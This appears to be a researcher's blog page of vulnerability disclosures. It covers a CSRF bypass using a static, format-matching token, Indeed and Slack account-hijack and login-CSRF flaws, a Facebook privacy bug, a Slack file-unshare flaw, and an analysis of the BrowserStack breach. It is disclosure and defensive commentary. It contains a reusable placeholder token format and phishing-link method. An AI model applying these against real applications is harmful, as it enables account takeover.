Skip to content

A CSRF Protection Bypass Technique

This technique can be used to bypass CSRF protections in some applications by using a static CSRF token (for all users of that application) that looks like a specific format string.

So, to begin with, have you ever noticed CSRF tokens being something like this:

RHAU3cgmTvWy6RWSj+NdJy2v8y8Z0g2U5qTQg4ap/lqeLEfA==

If you have, have you ever looked at it more closely? The above string is basically divided into 3 parts separated by some delimiters. In the above example, the first part “RHAU3cgmTvWy6RWSj” and the second part “NdJy2v8y8Z0g2U5qTQg4ap” are separated by the delimiter “+”. The second part “NdJy2v8y8Z0g2U5qTQg4ap” and the third part “lqeLEfA” are separated by the delimiter “/”. The string finally ends with “==”.

So, considering the above example, if you encounter an application that uses CSRF tokens as shown above, try fiddling with the actual string making sure you keep the format consistent i.e. 3 parts separated by some delimiters and so on and so forth.

In my case, the format ended up being “xxxxxxxxxxxxxxxxxxxxxxxxx%2Bxxxxxxxxxxxxxxxxxxxxxxxxxx%2Fxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxw%3D%3D” which when decoded is “xxxxxxxxxxxxxxxxxxxxxxxxx+xxxxxxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxw==”

The length of the above string (or the number of x’s) would depend on different applications. So, consider this as just a PoC.

In a nutshell, what I observed was that an attacker can just trick a victim in order to submit a POST request with the above string as the csrf token as a POST parameter and the application server would gladly accept it because it was only looking to ensure the tokens met a specific format and didn’t really compare the actual value received to the value stored on the server side. As a result of this, I was able to bypass CSRF protections throughout the entire application.

———————————————————————

There are some more nuances to the above scenario as well. Consider the case of a double-submit CSRF protection. What that entails is that the CSRF tokens need to be sent in two places – one as a session cookie and one in the POST body. Or, maybe one as a custom header and one in the session cookie. Or, maybe one as a custom header and one in the POST body. There can be multiple possible combinations.

The jist is that they both need to be the same. This is mostly done to prevent the headache of storing the CSRF values on the server side. In such cases, bypassing the protection is not easy because as an attacker, you don’t really have any control over a victim’s browser to be able to set custom headers or session cookies. The most you can do is to trick a victim in order to submit a malicious POST request. But, since the browser sends the headers and/or cookies automatically, the chances of those values matching your value in the POST request are negligible. Hence, the protection, if implemented properly, can be quite effective.

But, when you consider the example discussed above, it was observed that even though the browser was sending a custom header and/or session cookie automagically along with the attacker tricked value “xxxxxxxxxxxxxxxxxxxxxxxxx%2Bxxxxxxxxxxxxxxxxxxxxxxxxxx%2Fxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxw%3D%3D” in the POST body, the server was only looking to ensure that the format matched and not the actual values. So, again, this was a complete CSRF protection bypass because it didn’t matter what CSRF values the browser was sending (as headers and/or cookies) as long as an attacker could trick a victim to submit a POST request with the above static CSRF string.

I am not sure if this technique was already known. If it was, pardon my ignorance. I found this during testing and thought it was pretty interesting hence this post.

Cheers!

Account Hijacking in Indeed

Authenticating to an account on the Indeed iPhone app and then changing the country triggers the user to logout (at least it appears to log out a user). The country changes just fine but instead of the user still being logged in, the “Sign In” option appears in the application. When the user clicks on this “Sign In” option, a set of requests are sent to the server which automatically logs the user back in (obviously because the user never logged out in the first place. The user just changed the country).

Within these URLs that are sent out, there is one particular request that gets sent to the “/account/checklogin” endpoint with the value “passrx” over HTTP. What this means is that a MiTM attacker can easily retrieve this URL over the network.

The attacker can then use the captured URL to take over the victim’s account completely.

It should also be noted that this is not only an account hijacking vulnerability but also a login CSRF vulnerability. An attacker can easily capture the above request for his own account and then trick a victim to login that account.

But, as it is obvious, the more serious vulnerability here is the account hijacking vulnerability by a MiTM attacker.

A PoC video demonstrating the vulnerability is here.

This vulnerability was reported via Bugcrowd to the Indeed bug bounty program and this issue was deemed as a duplicate. I then got explicit permission from the program owners to disclose this publicly.

Cheers!

A little note about Slack’s Bug Bounty program

I reported a bug to Slack via HackerOne on December 13, 2014. Slack closed it as N/A. Considering it was N/A, I went ahead and blogged about it here on December 18, 2014. I gave them a heads up as well on the submission at HackerOne that I will be disclosing it before I actually disclosed it. They kept radio silence so I assumed they didn’t have any issues. They never said not to disclose or anything like that which would make sense because it was marked as N/A meaning they are not interested in the bug in the first place.

Around the same time or rather a day earlier on December 12, 2014, I had reported another bug to Slack via HackerOne. And, they closed it as Duplicate. The entire submission along with the conversations can be found here. In a nutshell, they wanted to do a coordinated disclosure once the issue was fixed. I was perfectly fine with it. I completely understand and respect the ethics of a bug bounty program and I agreed to that. But, after that, there was complete radio silence. I tried following up multiple times but nobody cared to respond or update me regarding the fix as is evident from the document. I also left a comment (1 month and then 4 days before the disclosure) that if I don’t hear back with any update or anything, I would go ahead and disclose it 90 days after the initial submission. According to industry standards, that seems to be the trend these days so I chose to stick with it. I finally disclosed it here on this blog.

On March 12, 2015, I reported yet another bug to Slack, again via the HackerOne platform. This bug was closed today March 16, 2015 as N/A without any explanation or reasoning. The entire conversation along with the bug submission can be found here. Consider this document as a public disclosure for this bug since it is marked and closed as N/A and they don’t seem to be interested in it anyways.

As evident from the latest bug submission document, I have been told that I have “gone against the spirit of a bug bounty program by disclosing things without consent”. They feel that for the second bug described above, “the disclosure is owned by the original reporter.” and, that “By disclosing this without coordinating” I have stolen “the original reporter’s opportunity to disclose a finding.” They have apparently spoken to HackerOne last week and asked to remove me from participating in their bug bounty program. I was apparently supposed to receive some communication regarding this (which btw I never did).

Final Thoughts:

I am honestly very disappointed with how things have been handled. I personally don’t think I did anything against the spirit of a bug bounty program. I am all for coordinated disclosure but if the program owners fail to coordinate or communicate in a timely manner, there is no such thing called coordinated disclosure. Combined with their responses on all my bug submissions and their decision to ban me from participating in their bug bounty program, this is probably the worst experience I have had so far and I feel this is a perfect example of how not to operate a bug bounty program.

I would love to get some feedback and thoughts on this. I am open to criticism and improving anything that I could have done better from my side to make this less painful.

Static Token used for authentication in the Slack iOS application

When I register for a Slack team from the Safari browser in my iPhone, the final request for registering a team looks like:

1

The response to this request is a redirect to the URL https://slack.com/checkcookie?redir=https%3A%2F%2Fn00bgiri.slack.com%2F%3Ffresh which is then redirected to https://n00bgiri.slack.com/?fresh which is then redirected to https://n00bgiri.slack.com/app. The series of these requests/responses can be seen below:

2

The final response for the request https://n00bgiri.slack.com/app looks like:

3

This screenshot is taken from the Safari browser in the iPhone.

An important thing to notice here is the option “Open Slack”. That is actually a hyperlink that looks like: <a href="slack://login/<redacted>/xoxo-<redacted>-<redacted>" class="btn btn-primary btn-large">Open Slack</a>

The value xoxo-<redacted>-<redacted> in the above URL is the keys to the kingdom. It can be essentially considered as a replacement for the username/password combination. It is a static value that does not change or get invalidated even if the account is logged out. This brings us to the first issue i.e. If an attacker gets hold of this value of a victim (by different attack vectors which is out of scope for the purposes of this discussion), he can essentially gain complete access of a victim’s account perpetually. It does not matter if the victim is logged in or not since it is a static token and does not get invalidated on logout. Please note that the above value should not be confused with another token value that looks similar but is of the form xoxs-<redacted>-<redacted>-<redacted>-<redacted>. I will describe what this other value is in a moment. The xoxo value is only created/sent in the response once when the team is first registered so that’s important to know here.

Now, the normal authentication flow in the Slack iOS app is something like below:

  • The first authentication request is sent to the URL https://slack.com/api/auth.signin with the POST parameters email, password and team.
  • In response to the above request, the server assigns and sends a token (xoxs-<redacted>-<redacted>-<redacted>-<redacted>) in the JSON response.
  • Then, a request is sent to the URL https://slack.com/api/users.login with the POST parameters agent,set_active and token. The token sent here is the xoxs token received above. This completes the authentication flow.
  • The xoxs token is then used in all subsequent requests.

Now, if you logout of the iOS application, this xoxs token gets invalidated (as it should be) but the static xoxo token discussed earlier does not. And, that’s the problem.

This brings me to the second attack aka Login CSRF:

Normally, in a Login CSRF attack, an attacker tricks a victim to submit an authentication request with the username and password as parameters in the request. If there are no CSRF tokens present in this request, it becomes possible to trick victims to authenticate to an attacker controlled account.

So, we now know that the xoxo token is a static token and can be treated as username/password. Therefore, the authentication request would look something like this:

Screen Shot 2015-03-12 at 2.08.49 AM

Notice there is nothing that can be considered as a CSRF token in the above request.

I have created a video PoC for this attack as well.

Exploiting the Login CSRF is extremely easy in this case.
What I essentially did was that as an attacker, I noted down the hyperlink that the server sent when I first registered my team: slack://login/<redacted>/xoxo-<redacted>-<redacted>

I, then sent, the victim an email with this link above as a hyperlink. When the victim clicks on that, the Slack iOS app opens up and sends the above authentication request automatically. I didn’t even have to craft a HTML that sends a POST request to the /api/users.login endpoint. It was as simple as tricking the victim to click on a GET URL. The Slack app does all the leg work for the attackers.

So, that’s if folks. To summarize, I described 2 issues above:

  1. Static tokens that don’t get invalidated
  2. Login CSRF

 

Remediation:

I am not an expert in iOS pentesting but I googled the correct way to handle iOS URL schemes and I saw these websites:

I think they are worth looking into. The premise is essentially that, you should be asking the victim user before opening up the slack:// URL automatically in the Slack application to mitigate the Login CSRF issue.

For the static token issue, I think it’s a bad idea to associate static tokens with user accounts all together. So, that should be looked into as well and tried to get rid of. If not, I don’t see any reason of sending that value in the response in clear text after registering.

 

Slack’s Response:

Thanks for your extensive report. Both of these issues are already known and being fixed.

1) The static tokens are something we are moving away from for all apps, including iOS. We hope to have this completed soon.
2) There is not much security implication of logging a user in this way. Because Slack groups are closed to the public, it would be difficult to convince the user they are in the correct group if you manage to log them in. We have an open bug to add CSRF to the login page,but this is low priority.

 

Cheers!

 

 

A bug in Facebook that violated my privacy

The bug that I am going to describe here was actually discovered accidentally while I was checking my privacy settings in Facebook. And, it is so simple that one doesn’t need to be technical at all to find it. It could have been discovered by anybody (literally). I guess I just got lucky and the fact that I have been a Facebook user since 2007 aided in the discovery as well. But, the bottom line is that you just need to be looking at the right place at the right time to earn bounties from the various bug bounty programs out there.

Anyways, let’s get to the bug now.

Privacy Violation Bug#1

This bug allowed disclosure of “parents” information (to the public) of some Facebook users inspite of the privacy settings being explicitly set to not allow that information to be viewed by the public or friends. I believe this affected certain Facebook users and not all. Specially, those that have been Facebook users around 2007 or so.

I’ve had my Facebook account since 2007 and I believe Mark Zuckerberg did too :)

Both, Zuk and I were affected because of this. I am sure there were others affected as well.

I’ll let you watch this video http://youtu.be/UFd68EG3E98 to show this in action.

It was as simple as clicking a hyperlink for the “BORN” highlight on your timeline. That would take you to a page that looks something like https://www.facebook.com/<user-id>/posts/<post-id>/. And, you would see yourself tagged with your parents.

This bug was worth $5000.  I think this is a pretty generous amount for this bug. But, I am sure they rewarded this considering the ease of how this information could be leaked and the privacy violation for a lot of Facebook users.

Cheers!

Hidden Feature in Slack leads to Unauthorized Information Leakage of Files

Before I get started, following is a legend:

  • Victim – V
  • Attacker – A
  • public URL – PU
  • Shared URL – SU

Now, let’s get to the issue.

There is a hidden feature in Slack that is not directly accessible from the UI. It is not documented either. But, it is a pretty simple call to an API endpoint that can be made via a proxy tool such as Burp. This API call is basically used to “unshare a file shared with a Slack user”. An important point to note here is that this vulnerability is regarding sharing a file with a different user and NOT within a channel. The sharing-unsharing aspect of files within a channel is a legitimate feature in the UI. It is also mentioned in the tweet from Slack here. But, this vulnerability is not about that. It is about sharing-unsharing files with *users* directly and not within channels.

So, due to this hidden feature, it is possible to share a file from V to A and then unshare it again from V to A (assuming V changes mind and does not want to share the file anymore with A) rendering the file inaccessible to A via a SU.

It was observed that it is possible to get past this control by accessing the now unshared file via a different URL – PU. Please see the video PoC or the Reproduction steps on how A can find PU and store it before V decides to unshare the file with A.

So, now after the file is unshared with A, A accesses PU (stored earlier) and the file now becomes public to everyone in the team without V’s knowledge. You can think of it as an Insecure Direct Object Reference vulnerability. This is the first problem.

Then, assuming V happens to navigate to that file again,  V suddenly notices that the unshared file now has been made public via the PU without V’s knowledge or consent. But, V does not freak out because V can still revoke the PU and it won’t be accessible by A or anybody else anymore. This revoking feature is provided in the UI as well. This is true. The PU indeed gets revoked and becomes inaccessible and it appears that this file could not be accessed/viewed by A or any other team member by any other means.

But, the problem does not end just yet. On A’s Slack homepage, on the right hand pane, A notices that this file is still visible. A clicks on the file, refreshes the UI and can still view the contents of this file with whatever changes V has made or makes in the future. This is the second problem.

So, this is clearly a security vulnerability where an attacker can view a file despite of it being unshared repeatedly.

I also sent them a video PoC demonstrating this in action. If you are interested, you can view it here. The video is a bit long (~9 mins) and the volume is a little bit low so you would need some kind of headphones to listen to my irritating voice :-)

The report along with the comments on HackerOne is available here.

 

Conclusion

I am disappointed with how Slack dismissed my original report without even bothering to read the report properly and making any sense out of it or ask me questions if they didn’t understand anything. I totally understand and respect their decision that this falls outside the scope of their Bug Bounty program but I wasn’t asking to be rewarded in the first place. I was simply reporting a security vulnerability. The scope and whether to reward a certain bug or not is completely on them and I understand that as a researcher, I need to respect that. Oh btw, they have not mentioned anything about “Undocumented APIs” in their scope so how would a researcher know what is in scope and what is out of scope? All I can see in their guidelines is “Our security team will assess each bug to determine if it qualifies.” But, they failed to assess the bug properly in the first place.

Anyways, some takeaways for both programs and researchers from this are:

  • Read the bug report once. If its confusing or doesn’t make sense, read it again. Ask the researcher if its still not clear. Make an effort to watch/read the PoC provided. Don’t just assume things.
  • Document features/functions/API calls if you allow them. Not documenting something and yet silently allowing them can be an issue as is evident from this case. They are relying on the fact that this feature is not being used by Slack users. This is naive IMHO.
  • Revise your scope to make it fine grained and much clearer. Scoping is a constant learning/revision process.
  • Don’t ignore the underlying problem which, in this case, I *believe* is the fact that the “permalink_public” URL is generated without the need of it. For instance, why would they want to generate this URL even before a file is revoked? And, even if they are generating it before its revoked, why send it to the client? It is like opening a can of worms. I don’t think its necessary to do that but they failed to even acknowledge that fact or reason as to why they are doing that.
  • Researchers need to submit quality reports and should not be discouraged by dismissing responses. We need to change the general thought most Bug Bounty Programs have these days – that all researchers want is a bounty for a crappy report.

That’s it folks.

 

Cheers!

Analysis of the BrowserStack breach – A classic example of “Pivoting in the Clouds”

BrowserStack was recently breached and it was all over the news as is the case with almost all breaches these days.

In this blog post, I will briefly describe what happened to make everybody aware that things can go really wrong in the Cloud if proper measures are not taken.

 

The Tl;DR version:

BrowserStack’s infrastructure is hosted on the Amazon Web Services (AWS).

They had one particular machine (virtual instance in this case) on the AWS that was not patched against the ShellShock vulnerability.

The attacker leveraged that to pivot through the various moving parts within their AWS setup and steal some information from their production database.

The attacker then used the stolen data and credentials of their AWS SES (See below) service to send emails to some BrowserStack users stating that BrowserStack is shutting down. Ouch!!

 

The longer version:

Attackers took advantage of the un-patched instance -> logged in that instance -> created an IAM user (See below) and generated a key-pair by using the secret keys stored on that instance -> spawned a new instance using the newly created credentials -> mounted one of the production backup disks to this instance -> retrieved config file with database password from this backup -> copied database tables partially and stole some data. While the database tables were being copied, it triggered an alert and the BrowserStack folks acted immediately blocking the IP.

 

But, by this time, the attacker already had stolen some data and the SES (See below) credentials which helped them send a fake email to some BrowserStack users.

 

IAM

This is the AWS Identity Access Management solution where you can create multiple users in an organization and assign the appropriate access rights to them following the minimum privilege access model. In other words, just give the amount of access to an individual that the individual’s role demands. Nothing more than that.

 

SES

This is the AWS Simple Email Service which is a service for sending out emails.

 

Below is purely my analysis on this incident. Please feel free to comment/ask questions/criticize:

 

Some of the poor practices done by BrowserStack on the AWS Cloud:

1. AWS Secret keys were stored on the un-patched instance. Secret keys should be stored securely following the AWS Best Practices.

2. I don’t think they had an inventory of all their running AWS instances. Maybe, they did because it could be obtained from their AWS Console. But, I cannot be sure. Assuming they knew about this running instance, they should have really patched it against ShellShock. This was the root cause and could have prevented the breach all together even if other protections didn’t exist.

3. They did have some alerts but they should have really built a lot more alerts like while creating a new IAM user, creating key pairs, etc.

4. Allowing IAM users to be created with elevated privileges. This is an educated guess. If they allowed the newly created IAM user to start a new instance, mount a backup to it, etc., I am guessing this IAM user had elevated privileges. Was this really necessary?

5. 2-factor authentication. AWS provides the capability to implement 2-factor authentication which I don’t think was being leveraged here.

6. Storage of sensitive information. The database password was stored in a config file that was readable. This could have been locked down better. Was the backup disk the only place where they stored the database password?

7. There is no mention of how the attacker obtained the SES credentials. I am guessing that was stored on the backup disk as well.

 

Having talked about the poor practices, there were some good things that BrowserStack did as well:

1. Passwords hashed using bcrypt. This is a biggie!! Never store passwords in cleartext.

2. Alerts triggered at some point. Due to the alert that got triggered while copying database tables, the magnitude of impact was reduced drastically so that’s good.

3. They mention auditing by AWS Cloud Trail that helped them track the attacker’s movements.

4. Credit Card data processed through 3rd party so the credit card details were not stored on their instances. Again, this is a biggie when it comes to dealing with Credit Card data on the cloud. Leveraging a 3rd party to do this often helps as evident from this case.

5. Locking database when copied. A good fail-over mechanism which helped them in this case to some extent.

6. Other instances were patched against ShellShock so the attack surface was reduced.

7. Instances protected by OS firewall in addition to network firewalls. Defense in depth

8. They mention implementing “security groups” which is a AWS good practice. This helps segregate and isolate different moving parts.

9. Most importantly, they were pretty quick in responding to this breach. So, that was a big plus!

10. They did some more improvements as mentioned in the link below like encrypting backups, auditing logs more, revoking all existing AWS keys, improving monitoring and requesting a 3rd party to conduct a security audit. All these things are definitely going to improve their security posture.

 

Reference URL:

http://www.nextbigwhat.com/browserstack-hack-attack-explanation-297/